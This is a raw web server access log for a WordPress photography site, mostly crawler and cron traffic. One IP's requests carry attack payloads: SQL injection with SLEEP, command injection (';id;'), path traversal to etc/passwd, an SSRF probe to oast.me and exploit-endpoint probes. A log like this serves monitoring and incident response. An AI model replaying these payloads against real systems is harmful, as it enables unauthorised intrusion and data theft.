157.20.32.210 - - [18/Oct/2025:13:58:09 -0400] "POST /assets/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:58:40 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 12313 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:13:59:03 -0400] "GET /products60940646?kg=0060197550 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:13:59:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760810354.2695479393005371093750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:13:59:07 -0400] "GET /model-versions/get-artifact?path=random&name=RYLioK&version=2 HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
157.20.32.210 - V3Ksp [18/Oct/2025:13:57:17 -0400] "PATCH /mgmt/tm/auth/user/V3Ksp HTTP/1.1" 404 12309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:57:26 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 404 12309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
146.190.11.185 - - [18/Oct/2025:13:57:29 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:13:57:31 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 404 12309 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:57:51 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:13:57:56 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 404 114 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:57:58 -0400] "POST /assets/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:58:08 -0400] "GET /wp-json/post-smtp/v1/get-log HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:58:22 -0400] "POST /assets/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:58:48 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:13:58:58 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:13:59:16 -0400] "GET /products56766468?kg=0056074275 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.42.58.162 - - [18/Oct/2025:13:59:20 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40"
98.70.29.56 - - [18/Oct/2025:13:59:24 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:13:59:31 -0400] "GET /products73872242?kg=0072971444 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.42.58.162 - - [18/Oct/2025:13:59:31 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40"
216.73.216.159 - - [18/Oct/2025:13:59:37 -0400] "GET /products32085812?kg=0031694603 HTTP/1.1" 404 9745 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:42 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:40 -0400] "GET /products56771680?kg=0056079425 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:25 -0400] "GET /products121014776?kg=0119539069 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:52 -0400] "GET /products175165972?kg=0173029883 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:14:00:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760810415.6692330837249755859375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.105 - - [18/Oct/2025:14:00:19 -0400] "GET /products113109452?kg=0111730151 HTTP/1.1" 200 29019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:14:00:22 -0400] "GET /?products4983104?kg=0004922417 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:14:00:24 -0400] "GET /products93708908?kg=0092566199 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:00:36 -0400] "GET /products89547768?kg=0088455805 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:00:42 -0400] "GET /products235684026?kg=0232809912 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:00:48 -0400] "GET /products107125834?kg=0105819504 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:00:51 -0400] "GET /model-versions/get-artifact?name=34EYbPYVzvQdqOPrbJfTamKkWZ1&path=etc%2Fpasswd&version=1 HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:00:54 -0400] "GET /products87903016?kg=0086831109 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:01:06 -0400] "GET /products199366268?kg=0196935055 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:14:01:06 -0400] "GET /products60885250?kg=0060142828 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:14:01:14 -0400] "GET /products89539568?kg=0088447705 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:01:24 -0400] "GET /products235666770?kg=0232792868 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:01:35 -0400] "GET /products68862898?kg=0068023188 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:01:50 -0400] "GET /webui/ HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:14:01:53 -0400] "POST /Tool/uploadfile.php HTTP/1.1" 404 9690 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
103.176.179.166 - - [18/Oct/2025:13:59:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 205 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:13:59:43 -0400] "GET /products120972094?kg=0119496906 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:46 -0400] "GET /products218216920?kg=0215555821 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:13:59:58 -0400] "GET /products107086752?kg=0105780897 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:14:00:03 -0400] "GET /products60931298?kg=0060188316 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:00:13 -0400] "GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:00:04 -0400] "GET /products218222582?kg=0215561414 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:14:00:16 -0400] "GET /products54913300?kg=0054243707 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:00:34 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
157.20.32.210 - - [18/Oct/2025:14:00:43 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 12313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
216.73.216.159 - - [18/Oct/2025:14:01:00 -0400] "GET /products87910118?kg=0086838126 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:14:01:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760810478.2712728977203369140625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:01:42 -0400] "POST /Tool/uploadfile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:14:02:10 -0400] "GET /products60896726?kg=0060154166 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:02:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:02:31 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.12"
157.20.32.210 - - [18/Oct/2025:14:02:45 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
157.20.32.210 - - [18/Oct/2025:14:02:50 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;ifconfig;%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.5"
157.20.32.210 - - [18/Oct/2025:14:02:48 -0400] "GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20"
216.73.216.159 - - [18/Oct/2025:14:01:56 -0400] "GET /products87968156?kg=0086895455 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:01:57 -0400] "POST /services/messagebroker/streamingamf HTTP/1.1" 404 12314 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/11.0"
157.20.32.210 - - [18/Oct/2025:14:02:02 -0400] "GET /home/vfmrd.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15"
185.61.153.107 - - [18/Oct/2025:14:02:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760810534.7735660076141357421875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:14:02:19 -0400] "GET /products106792982?kg=0105490710 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:02:31 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Mobile/15E148 Safari/604.1"
40.77.167.65 - - [18/Oct/2025:14:02:33 -0400] "GET /f/services/anpi/safetylink24/ HTTP/1.1" 200 28906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:02:50 -0400] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;id;%27 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17"
216.73.216.159 - - [18/Oct/2025:14:02:50 -0400] "GET /products196937628?kg=0194536031 HTTP/1.1" 404 9735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:03:04 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.12"
185.61.153.107 - - [18/Oct/2025:14:03:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760810598.9816799163818359375000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.105 - - [18/Oct/2025:14:03:24 -0400] "GET /?products4985882?kg=0004925160 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:14:03:25 -0400] "GET /products83725968?kg=0082705001 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
196.240.60.201 - - [18/Oct/2025:14:03:37 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:14:04:21 -0400] "GET /products60879128?kg=0060136781 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:14:05:25 -0400] "POST /wp-cron.php?doing_wp_cron=1760810725.9713640213012695312500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:14:05:22 -0400] "GET /products60917012?kg=0060174203 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:14:06:26 -0400] "POST /wp-cron.php?doing_wp_cron=1760810786.4698309898376464843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:14:06:22 -0400] "GET /products167587126?kg=0165543462 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:14:06:32 -0400] "GET /products122714230?kg=0121217798 HTTP/1.1" 200 28932 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:06:27 -0400] "GET /products60936856?kg=0060193805 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:14:06:47 -0400] "GET /products17950488?kg=0017731661 HTTP/1.1" 200 28910 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:14:07:28 -0400] "GET /?products4924952?kg=0004864973 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:14:03:15 -0400] "GET /products60871310?kg=0060129058 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:14:03:25 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=61444 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:14:03:26 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=59844 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.189.247.132 - - [18/Oct/2025:14:03:33 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
18.171.59.255 - - [18/Oct/2025:14:03:33 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:14:03:35 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:14:03:34 -0400] "POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
216.73.216.159 - - [18/Oct/2025:14:04:11 -0400] "GET /products108195346?kg=0106875972 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:14:04:23 -0400] "POST /wp-cron.php?doing_wp_cron=1760810663.7677469253540039062500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:04:33 -0400] "GET /?p=1 HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0"
157.20.32.210 - - [18/Oct/2025:14:04:48 -0400] "GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:14:04:53 -0400] "GET /products22753032?kg=0022475637 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:14:06:44 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:14:07:34 -0400] "POST /wp-cron.php?doing_wp_cron=1760810854.2697319984436035156250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:07:30 -0400] "GET /index.php?login=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.29 (KHTML, like Gecko) Version/17.7 Safari/617.29"
20.171.207.254 - - [18/Oct/2025:14:07:32 -0400] "GET /products60907304?kg=0060164613 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:14:07:46 -0400] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/16.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:14:08:38 -0400] "POST /wp-cron.php?doing_wp_cron=1760810917.9704000949859619140625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
98.70.29.56 - - [18/Oct/2025:14:08:40 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
18.171.59.255 - - [18/Oct/2025:14:08:56 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
206.189.247.132 - - [18/Oct/2025:14:08:56 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
138.68.166.157 - - [18/Oct/2025:14:09:11 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
157.20.32.210 - {{username}} [18/Oct/2025:14:09:08 -0400] "GET /api/v3/user/orgs HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:14:09:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760810961.8773150444030761718750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:14:09:19 -0400] "GET /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
